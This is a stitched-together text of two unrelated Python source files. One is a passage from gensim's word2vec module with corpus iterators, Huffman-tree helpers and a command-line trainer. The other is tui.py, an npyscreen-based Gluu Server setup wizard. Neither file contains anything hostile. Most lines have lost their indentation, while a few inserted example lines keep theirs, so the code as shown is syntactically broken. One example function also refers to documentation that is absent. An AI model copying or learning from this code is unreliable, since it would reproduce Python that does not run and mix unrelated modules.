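# A minimal, hypothetical example of the scoring and prediction APIs documented above:
# score() requires a model trained with hs=1 and negative=0, while predict_output_word()
# requires negative > 0, so two separate toy models are built. The corpus is made up and
# only meant to show the call signatures; the function is never called by this module.
def _example_score_and_predict():
    toy_corpus = [
        ["the", "quick", "brown", "fox"],
        ["the", "lazy", "dog"],
        ["the", "quick", "dog"],
    ] * 50
    hs_model = Word2Vec(toy_corpus, vector_size=10, min_count=1, hs=1, negative=0, epochs=5)
    log_probs = hs_model.score(toy_corpus, total_sentences=len(toy_corpus))
    ns_model = Word2Vec(toy_corpus, vector_size=10, min_count=1, hs=0, negative=5, epochs=5)
    predictions = ns_model.predict_output_word(["the", "quick"], topn=3)
    return log_probs, predictions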
class BrownCorpus:
def __init__(self, dirname):
"""Iterate over sentences from the `Brown corpus <https://en.wikipedia.org/wiki/Brown_Corpus>`_
(part of `NLTK data <https://www.nltk.org/data.html>`_).
"""
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
fname = os.path.join(self.dirname, fname)
if not os.path.isfile(fname):
continue
with utils.open(fname, 'rb') as fin:
for line in fin:
line = utils.to_unicode(line)
# each file line is a single sentence in the Brown corpus
# each token is WORD/POS_TAG
token_tags = [t.split('/') for t in line.split() if len(t.split('/')) == 2]
# ignore words with non-alphabetic tags like ",", "!" etc (punctuation, weird stuff)
words = ["%s/%s" % (token.lower(), tag[:2]) for token, tag in token_tags if tag[:2].isalpha()]
if not words: # don't bother sending out empty sentences
continue
yield words
class Text8Corpus:
def __init__(self, fname, max_sentence_length=MAX_WORDS_IN_BATCH):
"""Iterate over sentences from the "text8" corpus, unzipped from http://mattmahoney.net/dc/text8.zip."""
self.fname = fname
self.max_sentence_length = max_sentence_length
def __iter__(self):
# the entire corpus is one gigantic line -- there are no sentence marks at all
        # so just split the sequence of tokens arbitrarily: one sentence = max_sentence_length tokens
sentence, rest = [], b''
with utils.open(self.fname, 'rb') as fin:
while True:
text = rest + fin.read(8192) # avoid loading the entire file (=1 line) into RAM
if text == rest: # EOF
words = utils.to_unicode(text).split()
sentence.extend(words) # return the last chunk of words, too (may be shorter/longer)
if sentence:
yield sentence
break
last_token = text.rfind(b' ') # last token may have been split in two... keep for next iteration
words, rest = (utils.to_unicode(text[:last_token]).split(),
text[last_token:].strip()) if last_token >= 0 else ([], text)
sentence.extend(words)
while len(sentence) >= self.max_sentence_length:
yield sentence[:self.max_sentence_length]
sentence = sentence[self.max_sentence_length:]
class LineSentence:
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""Iterate over a file that contains sentences: one line = one sentence.
Words must be already preprocessed and separated by whitespace.
Parameters
----------
source : string or a file-like object
Path to the file on disk, or an already-open file object (must support `seek(0)`).
limit : int or None
Clip the file to the first `limit` lines. Do no clipping if `limit is None` (the default).
Examples
--------
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>> sentences = LineSentence(datapath('lee_background.cor'))
>>> for sentence in sentences:
... pass
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
def __iter__(self):
"""Iterate through the lines in the source."""
try:
# Assume it is a file-like object and try treating it as such
# Things that don't have seek will trigger an exception
self.source.seek(0)
for line in itertools.islice(self.source, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
except AttributeError:
# If it didn't work like a file, use it as a string filename
with utils.open(self.source, 'rb') as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
class PathLineSentences:
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""Like :class:`~gensim.models.word2vec.LineSentence`, but process all files in a directory
in alphabetical order by filename.
The directory must only contain files that can be read by :class:`gensim.models.word2vec.LineSentence`:
.bz2, .gz, and text files. Any file not ending with .bz2 or .gz is assumed to be a text file.
The format of files (either text, or compressed text files) in the path is one sentence = one line,
with words already preprocessed and separated by whitespace.
Warnings
--------
Does **not recurse** into subdirectories.
Parameters
----------
source : str
Path to the directory.
limit : int or None
Read only the first `limit` lines from each file. Read all if limit is None (the default).
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
if os.path.isfile(self.source):
logger.debug('single file given as source, rather than a directory of files')
logger.debug('consider using models.word2vec.LineSentence for a single file')
self.input_files = [self.source] # force code compatibility with list of files
elif os.path.isdir(self.source):
self.source = os.path.join(self.source, '') # ensures os-specific slash at end of path
logger.info('reading directory %s', self.source)
self.input_files = os.listdir(self.source)
self.input_files = [self.source + filename for filename in self.input_files] # make full paths
self.input_files.sort() # makes sure it happens in filename order
else: # not a file or a directory, then we can't do anything with it
raise ValueError('input is neither a file nor a path')
logger.info('files read into PathLineSentences:%s', '\n'.join(self.input_files))
def __iter__(self):
"""iterate through the files"""
for file_name in self.input_files:
logger.info('reading file %s', file_name)
with utils.open(file_name, 'rb') as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i:i + self.max_sentence_length]
i += self.max_sentence_length
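# --- Illustrative usage sketch (editor's addition) ---
# Streaming a whole directory of pre-tokenised, one-sentence-per-line files into Word2Vec
# without loading the corpus into memory. The directory path is hypothetical, and the
# function is never called by this module.
def _example_train_from_directory(corpus_dir='/path/to/corpus_dir'):
    sentences = PathLineSentences(corpus_dir)
    return Word2Vec(sentences=sentences, vector_size=100, window=5, min_count=5, workers=4)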
class Word2VecVocab(utils.SaveLoad):
"""Obsolete class retained for now as load-compatibility state capture."""
pass
class Word2VecTrainables(utils.SaveLoad):
"""Obsolete class retained for now as load-compatibility state capture."""
pass
class Heapitem(namedtuple('Heapitem', 'count, index, left, right')):
def __lt__(self, other):
return self.count < other.count
def _build_heap(wv):
heap = list(Heapitem(wv.get_vecattr(i, 'count'), i, None, None) for i in range(len(wv.index_to_key)))
heapq.heapify(heap)
for i in range(len(wv) - 1):
min1, min2 = heapq.heappop(heap), heapq.heappop(heap)
heapq.heappush(
heap, Heapitem(count=min1.count + min2.count, index=i + len(wv), left=min1, right=min2)
)
return heap
def _assign_binary_codes(wv):
"""
Appends a binary code to each vocab term.
Parameters
----------
wv : KeyedVectors
A collection of word-vectors.
Sets the .code and .point attributes of each node.
Each code is a numpy.array containing 0s and 1s.
Each point is an integer.
"""
logger.info("constructing a huffman tree from %i words", len(wv))
heap = _build_heap(wv)
if not heap:
#
# TODO: how can we end up with an empty heap?
#
logger.info("built huffman tree with maximum node depth 0")
return
# recurse over the tree, assigning a binary code to each vocabulary word
max_depth = 0
stack = [(heap[0], [], [])]
while stack:
node, codes, points = stack.pop()
if node[1] < len(wv): # node[1] = index
# leaf node => store its path from the root
k = node[1]
wv.set_vecattr(k, 'code', codes)
wv.set_vecattr(k, 'point', points)
# node.code, node.point = codes, points
max_depth = max(len(codes), max_depth)
else:
# inner node => continue recursion
points = np.array(list(points) + [node.index - len(wv)], dtype=np.uint32)
stack.append((node.left, np.array(list(codes) + [0], dtype=np.uint8), points))
stack.append((node.right, np.array(list(codes) + [1], dtype=np.uint8), points))
logger.info("built huffman tree with maximum node depth %i", max_depth)
# Example: ./word2vec.py -train data.txt -output vec.txt -size 200 -window 5 -sample 1e-4 \
# -negative 5 -hs 0 -binary 0 -cbow 1 -iter 3
if __name__ == "__main__":
import argparse
logging.basicConfig(
format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s',
level=logging.INFO
)
logger.info("running %s", " ".join(sys.argv))
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print(globals()['__doc__'] % locals())
sys.exit(1)
from gensim.models.word2vec import Word2Vec # noqa:F811 avoid referencing __main__ in pickle
np.seterr(all='raise') # don't ignore numpy errors
parser = argparse.ArgumentParser()
parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
parser.add_argument(
"-sample",
help="Set threshold for occurrence of words. "
"Those that appear with higher frequency in the training data will be randomly down-sampled;"
" default is 1e-3, useful range is (0, 1e-5)",
type=float, default=1e-3
)
parser.add_argument(
"-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument(
"-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
type=int, default=5
)
parser.add_argument("-threads", help="Use THREADS threads (default 12)", type=int, default=12)
parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
parser.add_argument(
"-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
type=int, default=5
)
parser.add_argument(
"-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
type=int, default=1, choices=[0, 1]
)
parser.add_argument(
"-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")
args = parser.parse_args()
if args.cbow == 0:
skipgram = 1
else:
skipgram = 0
corpus = LineSentence(args.train)
model = Word2Vec(
corpus, vector_size=args.size, min_count=args.min_count, workers=args.threads,
window=args.window, sample=args.sample, sg=skipgram, hs=args.hs,
negative=args.negative, cbow_mean=1, epochs=args.iter,
)
if args.output:
outfile = args.output
model.wv.save_word2vec_format(outfile, binary=args.binary)
else:
outfile = args.train
model.save(outfile + '.model')
if args.binary == 1:
model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
else:
model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)
if args.accuracy:
model.accuracy(args.accuracy)
logger.info("finished running %s", program)
|
tui.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import time
import random
import textwrap
import re
import socket
import curses
import string
import inspect
import threading
import math
from queue import Queue
from .messages import msg
# for putty connections we need the following env
os.environ['NCURSES_NO_UTF8_ACS'] = "1"
import npyscreen
queue = Queue()
#install types
NONE = 0
LOCAL = '1'
REMOTE = '2'
COMPLETED = -99
ERROR = -101
random_marketing_strings = [
'Having trouble? Open a ticket: https://support.gluu.org',
'Cluster your Gluu Server: https://gluu.org/docs/cm',
    'oxd exposes simple, static APIs for web application developers: https://gluu.org/docs/oxd',
'Gluu Gateway https://gluu.org/docs/gg',
'Super Gluu (2FA) https://gluu.org/docs/supergluu',
'Gluu Casa (self-service web portal) https://gluu.org/docs/casa',
"Let's discuss your project https://www.gluu.org/booking",
'Gluu has both a social and a business mission.',
'Consider Gluu VIP Platform Subscription https://gluu.org/contact',
"Deploy Gluu using Kubernetes: https://gluu.org/docs/de",
'Evaluate our commercial offerings: https://gluu.org/pricing',
]
marketing_text_period = 20
def getClassName(c):
try:
return getattr(c, '__class__').__name__
except:
return ''
class GluuSetupApp(npyscreen.StandardApp):
installObject = None
exit_reason = str()
my_counter = 0
do_notify = True
def onStart(self):
self.addForm("MAIN", MAIN, name=msg.MAIN_label)
for obj in list(globals().items()):
if not obj[0]=='GluuSetupForm' and obj[0].endswith('Form') and inspect.isclass(obj[1]):
print("Adding form", obj[0])
self.addForm(obj[0], obj[1], name=getattr(msg, obj[0]+'_label'))
def onCleanExit(self):
if self.do_notify:
npyscreen.notify_wait("setup.py will exit in a moment. " + self.exit_reason, title="Warning!")
class GluuSetupForm(npyscreen.FormBaseNew):
def beforeEditing(self):
self.parentApp.my_counter = 0
self.add_handlers({curses.KEY_F1: self.display_help})
self.add(npyscreen.MultiLineEdit, value='=' * (self.columns - 4), max_height=1, rely=self.lines-4, editable=False)
self.marketing_label = self.add(npyscreen.MultiLineEdit, value='', max_height=1, rely=self.lines-3, editable=False)
form_name = getClassName(self)
if form_name != 'InstallStepsForm':
next_x = 20 if form_name == 'MAIN' else 28
self.button_next = self.add(npyscreen.ButtonPress, name="Next", when_pressed_function=self.nextButtonPressed, rely=self.lines-5, relx=self.columns - next_x)
if next_x == 28:
self.button_back = self.add(npyscreen.ButtonPress, name="Back", when_pressed_function=self.backButtonPressed, rely=self.lines-5, relx=self.columns - 20)
self.button_quit = self.add(npyscreen.ButtonPress, name="Quit", when_pressed_function=self.quitButtonPressed, rely=self.lines-5, relx=self.columns - 12)
if hasattr(self, 'do_beforeEditing'):
self.do_beforeEditing()
def while_waiting(self):
if self.parentApp.my_counter % marketing_text_period == 0:
self.marketing_label.value = random.choice(random_marketing_strings)
self.marketing_label.update()
self.parentApp.my_counter += 1
if hasattr(self, 'do_while_waiting'):
self.do_while_waiting()
def quitButtonPressed(self):
        notify_result = npyscreen.notify_ok_cancel("Are you sure you want to quit?", title='Warning')
if notify_result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.switchForm(None)
def display_help(self, code_of_key_pressed):
class_name = self.__class__.__name__
if hasattr(msg, class_name+'Help'):
help_text = getattr(msg, class_name+'Help')
else:
help_text = msg.no_help
npyscreen.notify_confirm(help_text, title="Help", wide=True)
class MAIN(GluuSetupForm):
def create(self):
desc_wrap = textwrap.wrap(msg.decription, self.columns - 6)
self.description_label = self.add(npyscreen.MultiLineEdit, value='\n'.join(desc_wrap), max_height=6, rely=2, editable=False)
self.description_label.autowrap = True
self.os_type = self.add(npyscreen.TitleFixedText, name=msg.os_type_label, begin_entry_at=18, value=msg.os_type + ' ' + msg.os_version, editable=False)
self.init_type = self.add(npyscreen.TitleFixedText, name=msg.init_type_label, begin_entry_at=18, value=msg.os_initdaemon, editable=False)
self.httpd_type = self.add(npyscreen.TitleFixedText, name=msg.httpd_type_label, begin_entry_at=18, value=msg.apache_version, field_width=40, editable=False)
self.license_confirm = self.add(npyscreen.Checkbox, scroll_exit=True, name=msg.acknowledge_lisence)
self.warning_text = self.add(npyscreen.MultiLineEdit, value=msg.setup_properties_warning, max_height=4, editable=False)
for sys_req in ('file_max', 'mem_size', 'number_of_cpu', 'free_disk_space'):
cur_val = getattr(msg, 'current_' + sys_req)
req_val = getattr(msg, 'suggested_' + sys_req)
if cur_val < req_val:
warning_text = getattr(msg, 'insufficient_' + sys_req).format(cur_val, req_val)
if sys_req == 'file_max':
self.parentApp.exit_reason = warning_text
self.parentApp.onCleanExit()
time.sleep(3.5)
sys.exit(False)
warning_text += '. Do you want to continue?'
result = npyscreen.notify_yes_no(warning_text, title="Warning")
if not result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.onCleanExit()
sys.exit(False)
def nextButtonPressed(self):
if not self.license_confirm.value:
npyscreen.notify_confirm(msg.acknowledge_lisence_ask, title="Info")
return
self.parentApp.switchForm("HostForm")
def on_cancel(self):
self.title.value = "Hello World!"
def resize(self):
self.button_quit.rely = self.lines-5
self.button_quit.relx = self.columns-12
self.warning_text.rely = self.columns - 8
self.button_next.rely = self.lines-5
self.button_next.relx = self.columns-20
class HostForm(GluuSetupForm):
myfields_ = ('ip', 'hostname', 'city', 'state', 'orgName', 'admin_email', 'countryCode', 'application_max_ram', 'oxtrust_admin_password')
def create(self):
self.add(npyscreen.FixedText, value=make_title(msg.cert_info_label), editable=False)
self.ip = self.add(npyscreen.TitleText, name=msg.ip_label, begin_entry_at=25)
self.hostname = self.add(npyscreen.TitleText, name=msg.hostname_label, begin_entry_at=25)
self.orgName = self.add(npyscreen.TitleText, name=msg.orgName_label, begin_entry_at=25)
self.admin_email = self.add(npyscreen.TitleText, name=msg.admin_email_label, begin_entry_at=25)
self.city = self.add(npyscreen.TitleText, name=msg.city_label, begin_entry_at=25)
self.state = self.add(npyscreen.TitleText, name=msg.state_label, begin_entry_at=25)
self.countryCode = self.add(npyscreen.TitleText, name=msg.countryCode_label, begin_entry_at=25)
self.add(npyscreen.FixedText, value=make_title(msg.sys_info_label), rely=12, editable=False)
self.application_max_ram = self.add(npyscreen.TitleText, name=msg.application_max_ram_label, begin_entry_at=25)
self.oxtrust_admin_password = self.add(npyscreen.TitleText, name=msg.oxtrust_admin_password_label, begin_entry_at=25)
def nextButtonPressed(self):
if not self.hostname.value:
npyscreen.notify_confirm(msg.enter_hostname, title="Info")
return
if self.hostname.value.lower() == 'localhost':
npyscreen.notify_confirm(msg.enter_hostname_local, title="Info")
return
if not self.parentApp.installObject.check_email(self.admin_email.value):
npyscreen.notify_confirm(msg.enter_valid_email, title="Info")
return
if not self.parentApp.installObject.isIP(self.ip.value):
npyscreen.notify_confirm(msg.enter_valid_ip, title="Info")
return
if len(self.countryCode.value) < 2:
npyscreen.notify_confirm(msg.enter_valid_countryCode, title="Info")
return
if len(self.oxtrust_admin_password.value) < 6:
npyscreen.notify_confirm(msg.oxtrust_admin_password_warning, title="Info")
return
try:
int(self.application_max_ram.value)
except:
npyscreen.notify_confirm(msg.max_ram_int_warning, title="Info")
return
for k in self.myfields_:
f = getattr(self, k)
setattr(self.parentApp.installObject, k, f.value)
self.parentApp.installObject.application_max_ram = int(self.application_max_ram.value)
self.parentApp.switchForm('ServicesForm')
def do_beforeEditing(self):
if not self.parentApp.installObject.hostname:
self.parentApp.installObject.hostname = self.parentApp.installObject.detect_hostname()
for k in self.myfields_:
f = getattr(self, k)
v = getattr(self.parentApp.installObject, k)
if v:
f.value = str(v)
f.update()
def backButtonPressed(self):
self.parentApp.switchForm('MAIN')
class ServicesForm(GluuSetupForm):
services = ('installHttpd', 'installSaml', 'installOxAuthRP',
'installPassport', 'installGluuRadius', 'installOxd',
'installCasa', 'installScimServer', 'installFido2',
)
def create(self):
for service in self.services:
cb = self.add(npyscreen.Checkbox, scroll_exit=True, name = getattr(msg, 'ask_' + service))
setattr(self, service, cb)
self.oxd_url = self.add(npyscreen.TitleText, name=msg.oxd_url_label, rely=12, begin_entry_at=17, hidden=True)
self.installCasa.value_changed_callback = self.casa_oxd_option_changed
self.installOxd.value_changed_callback = self.casa_oxd_option_changed
def do_beforeEditing(self):
for service in self.services:
if getattr(self.parentApp.installObject, service):
cb = getattr(self, service)
cb.value = True
cb.update()
def nextButtonPressed(self):
for service in self.services:
cb_val = getattr(self, service).value
setattr(self.parentApp.installObject, service, cb_val)
if self.installOxd.value:
self.parentApp.installObject.oxd_server_https = 'https://{}:8443'.format(self.parentApp.installObject.hostname)
if self.installCasa.value:
if not self.installOxd.value and not self.oxd_url.value:
npyscreen.notify_confirm(msg.install_oxd_or_url_warning, title="Warning")
return
if not self.installOxd.value:
oxd_server_https = self.oxd_url.value
oxd_connection_result = self.parentApp.installObject.check_oxd_server(oxd_server_https)
if oxd_connection_result != True:
npyscreen.notify_confirm(
msg.oxd_connection_error.format(oxd_server_https, oxd_connection_result),
title="Warning"
)
return
oxd_hostname, oxd_port = self.parentApp.installObject.parse_url(oxd_server_https)
oxd_ssl_result = self.parentApp.installObject.check_oxd_ssl_cert(oxd_hostname, oxd_port)
if oxd_ssl_result :
npyscreen.notify_confirm(
msg.oxd_ssl_cert_error.format(oxd_ssl_result['CN'], oxd_hostname),
title="Warning")
return
self.parentApp.installObject.oxd_server_https = oxd_server_https
oxd_hostname, oxd_port = self.parentApp.installObject.parse_url(self.parentApp.installObject.oxd_server_https)
if not oxd_port:
oxd_port=8443
self.parentApp.installObject.templateRenderingDict['oxd_hostname'] = oxd_hostname
self.parentApp.installObject.templateRenderingDict['oxd_port'] = str(oxd_port)
if self.installOxd.value:
result = npyscreen.notify_yes_no(msg.ask_use_gluu_storage_oxd, title=msg.ask_use_gluu_storage_oxd_title)
if result:
self.parentApp.installObject.oxd_use_gluu_storage = True
self.parentApp.switchForm('DBBackendForm')
def casa_oxd_option_changed(self, widget):
if self.installOxd.value:
self.oxd_url.hidden = True
elif self.installCasa.value and not self.installOxd.value:
self.oxd_url.hidden = False
elif not self.installCasa.value:
self.oxd_url.hidden = True
self.oxd_url.update()
def backButtonPressed(self):
self.parentApp.switchForm('HostForm')
def make_title(text):
return '-'*10 + ' '+ text +' '+ '-'*10
class DBBackendForm(GluuSetupForm):
def create(self):
self.editw = 2
self.add(npyscreen.FixedText, value=make_title(msg.ask_wrends_install), editable=False)
self.ask_wrends = self.add(npyscreen.SelectOne, max_height=3,
values = msg.wrends_install_options, scroll_exit=True)
self.ask_wrends.value_changed_callback = self.wrends_option_changed
self.wrends_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.wrends_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.wrends_option_changed(self.ask_wrends)
self.add(npyscreen.FixedText, value=make_title(msg.ask_cb_install), rely=10, editable=False)
self.ask_cb = self.add(npyscreen.SelectOne, max_height=3,
values = msg.cb_install_options, scroll_exit=True)
self.ask_cb.value_changed_callback = self.cb_option_changed
self.cb_admin = self.add(npyscreen.TitleText, name=msg.username_label)
self.cb_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.cb_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.cb_option_changed(self.ask_cb)
def do_beforeEditing(self):
self.ask_wrends.value = [int(self.parentApp.installObject.wrends_install)]
if self.parentApp.installObject.wrends_install == REMOTE:
self.wrends_hosts.hidden = False
else:
self.wrends_hosts.hidden = True
if not self.parentApp.installObject.wrends_install:
self.wrends_password.hidden = True
else:
self.wrends_password.hidden = False
if self.parentApp.installObject.wrends_install == LOCAL:
if not self.parentApp.installObject.ldapPass:
self.wrends_password.value = self.parentApp.installObject.oxtrust_admin_password
self.wrends_hosts.value = self.parentApp.installObject.ldap_hostname
self.ask_cb.value = [int(self.parentApp.installObject.cb_install)]
if not self.parentApp.installObject.cb_install:
self.cb_admin.hidden = True
else:
self.cb_admin.hidden = False
if self.parentApp.installObject.cb_install == REMOTE:
self.cb_hosts.hidden = False
else:
self.cb_hosts.hidden = True
if not self.parentApp.installObject.cb_install:
self.cb_password.hidden = True
else:
self.cb_password.hidden = False
if self.parentApp.installObject.cb_install == LOCAL:
if not self.parentApp.installObject.cb_password:
self.cb_password.value = self.parentApp.installObject.oxtrust_admin_password
self.cb_hosts.value = self.parentApp.installObject.couchbase_hostname
self.cb_admin.value = self.parentApp.installObject.couchebaseClusterAdmin
self.wrends_hosts.update()
self.ask_wrends.update()
self.wrends_hosts.update()
self.wrends_password.update()
self.cb_hosts.update()
self.ask_cb.update()
self.cb_hosts.update()
self.cb_password.update()
def nextButtonPressed(self):
msg.backend_types = []
self.parentApp.installObject.wrends_install = str(self.ask_wrends.value[0]) if self.ask_wrends.value[0] else 0
if self.parentApp.installObject.wrends_install == LOCAL:
self.parentApp.installObject.ldap_hostname = 'localhost'
self.parentApp.installObject.ldapPass = self.wrends_password.value
elif self.parentApp.installObject.wrends_install == REMOTE:
self.parentApp.installObject.ldap_hostname = self.wrends_hosts.value
self.parentApp.installObject.ldapPass = self.wrends_password.value
result = self.parentApp.installObject.check_remote_ldap(
self.wrends_hosts.value,
self.parentApp.installObject.ldap_binddn,
self.wrends_password.value
)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
self.parentApp.installObject.cb_install = str(self.ask_cb.value[0]) if self.ask_cb.value[0] else 0
if self.parentApp.installObject.cb_install == LOCAL:
self.parentApp.installObject.couchbase_hostname = 'localhost'
self.parentApp.installObject.cb_password = self.cb_password.value
elif self.parentApp.installObject.cb_install == REMOTE:
self.parentApp.installObject.couchbase_hostname = self.cb_hosts.value
self.parentApp.installObject.couchebaseClusterAdmin = self.cb_admin.value
self.parentApp.installObject.cb_password = self.cb_password.value
result = self.parentApp.installObject.test_cb_servers(self.cb_hosts.value)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
if self.parentApp.installObject.cb_install:
self.parentApp.installObject.cache_provider_type = 'NATIVE_PERSISTENCE'
self.parentApp.installObject.add_couchbase_post_messages()
if self.parentApp.installObject.wrends_install and not self.parentApp.installObject.checkPassword(self.parentApp.installObject.ldapPass):
npyscreen.notify_confirm(msg.weak_password.format('WrenDS'), title="Warning")
return
if self.parentApp.installObject.cb_install and not self.parentApp.installObject.checkPassword(self.parentApp.installObject.cb_password):
npyscreen.notify_confirm(msg.weak_password.format('Couchbase Server'), title="Warning")
return
if self.parentApp.installObject.wrends_install or self.parentApp.installObject.cb_install:
if self.parentApp.installObject.wrends_install and self.parentApp.installObject.cb_install:
self.parentApp.installObject.persistence_type = 'hybrid'
self.parentApp.switchForm('StorageSelectionForm')
else:
storage_list = list(self.parentApp.installObject.couchbaseBucketDict.keys())
storage = 'ldap'
if self.parentApp.installObject.cb_install:
storage = 'couchbase'
for s in storage_list:
self.parentApp.installObject.mappingLocations[s] = storage
self.parentApp.installObject.persistence_type = storage
self.parentApp.switchForm('DisplaySummaryForm')
else:
npyscreen.notify_confirm(msg.notify_select_backend, title="Warning")
return
def wrends_option_changed(self, widget):
if self.ask_wrends.value:
if not self.ask_wrends.value[0]:
self.wrends_password.hidden = True
self.wrends_hosts.hidden = True
elif str(self.ask_wrends.value[0]) == LOCAL:
self.wrends_password.hidden = False
self.wrends_hosts.hidden = True
elif str(self.ask_wrends.value[0]) == REMOTE:
self.wrends_password.hidden = False
self.wrends_hosts.hidden = False
self.wrends_password.update()
self.wrends_hosts.update()
def cb_option_changed(self, widget):
if self.ask_cb.value:
if not self.ask_cb.value[0]:
self.cb_admin.hidden = True
self.cb_password.hidden = True
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == LOCAL:
self.cb_admin.hidden = False
self.cb_hosts.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == REMOTE:
self.cb_admin.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = False
self.cb_admin.update()
self.cb_password.update()
self.cb_hosts.update()
def backButtonPressed(self):
self.parentApp.switchForm('ServicesForm')
class StorageSelectionForm(GluuSetupForm):
def create(self):
self.wrends_storage = self.add(npyscreen.TitleMultiSelect, begin_entry_at=25, max_height=len(msg.storages),
values=msg.storages, name=msg.DBBackendForm_label, scroll_exit=True)
self.add(npyscreen.FixedText, value=msg.unselected_storages, rely=len(msg.storages)+4, editable=False, color='STANDOUT')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
def do_beforeEditing(self):
self.wrends_storage.values = list(self.parentApp.installObject.couchbaseBucketDict.keys())
value = []
for i, s in enumerate(self.parentApp.installObject.couchbaseBucketDict.keys()):
if self.parentApp.installObject.mappingLocations[s] == 'ldap':
value.append(i)
self.wrends_storage.value = value
self.wrends_storage.update()
def nextButtonPressed(self):
storage_list = list(self.parentApp.installObject.couchbaseBucketDict.keys())
for i, s in enumerate(storage_list):
if i in self.wrends_storage.value:
self.parentApp.installObject.mappingLocations[s] = 'ldap'
else:
self.parentApp.installObject.mappingLocations[s] = 'couchbase'
self.parentApp.switchForm('DisplaySummaryForm')
class DisplaySummaryForm(GluuSetupForm):
myfields_1 = ("hostname", "orgName", "os_type", "city", "state", "countryCode",
"application_max_ram")
myfields_2 = ( "installOxAuth", "installOxTrust",
"installHttpd", "installSaml", "installOxAuthRP",
"installPassport", "installGluuRadius",
"installOxd", "installCasa",
'installScimServer', 'installFido2',
"java_type",
"backend_types", 'wrends_storages')
def create(self):
for i, wn in enumerate(self.myfields_1):
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=24,
editable=False,
)
)
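        # lay the second group of fields out in two columns, splitting the list at its midpoint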
sec_col_n = math.ceil(len(self.myfields_2)/2.0)
for j, wn in enumerate(self.myfields_2):
if j < sec_col_n:
relx=2
rely = i+4+j
else:
relx=39
rely = i+4+j-sec_col_n
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=20,
editable=False,
rely=rely,
relx=relx,
)
)
def do_beforeEditing(self):
wrends_storages_widget = getattr(self, 'wrends_storages')
for wn in self.myfields_1+self.myfields_2:
w = getattr(self, wn)
if getClassName(w) == 'TitleFixedText':
if wn == 'backend_types':
bt_ = []
if self.parentApp.installObject.wrends_install == LOCAL:
bt_.append('wrends')
elif self.parentApp.installObject.wrends_install == REMOTE:
bt_.append('wrends[R]')
if self.parentApp.installObject.cb_install == LOCAL:
bt_.append('couchbase')
elif self.parentApp.installObject.cb_install == REMOTE:
bt_.append('couchbase[R]')
w.value = ', '.join(bt_)
elif wn == 'wrends_storages':
if self.parentApp.installObject.wrends_install and self.parentApp.installObject.cb_install:
wds_ = []
for k in self.parentApp.installObject.mappingLocations:
if self.parentApp.installObject.mappingLocations[k] == 'ldap':
wds_.append(k)
w.hidden = False
w.value = ', '.join(wds_)
else:
w.hidden = True
else:
val = getattr(self.parentApp.installObject, wn)
w.value = str(val)
w.update()
def backButtonPressed(self):
if self.parentApp.installObject.wrends_install and self.parentApp.installObject.cb_install:
self.parentApp.switchForm('StorageSelectionForm')
else:
self.parentApp.switchForm('DBBackendForm')
def nextButtonPressed(self):
# Validate Properties
self.parentApp.installObject.check_properties()
self.parentApp.switchForm('InstallStepsForm')
class InputBox(npyscreen.BoxTitle):
_contained_widget = npyscreen.MultiLineEdit
class InstallStepsForm(GluuSetupForm):
desc_value = None
def create(self):
        self.progress_percentage = self.add(npyscreen.TitleSliderPercent, accuracy=0, out_of=msg.installation_step_number+1, rely=4, editable=False, name="Progress")
self.installing = self.add(npyscreen.TitleFixedText, name=msg.installing_label, value="", editable=False)
self.description = self.add(InputBox, name="", max_height=6, rely=8)
def do_beforeEditing(self):
t=threading.Thread(target=self.parentApp.installObject.do_installation, args=(queue,))
t.daemon = True
t.start()
def do_while_waiting(self):
if not queue.empty():
data = queue.get()
if data[0] == COMPLETED:
if self.parentApp.installObject.post_messages:
npyscreen.notify_confirm('\n'.join(self.parentApp.installObject.post_messages), title="Post Install Messages", wide=True)
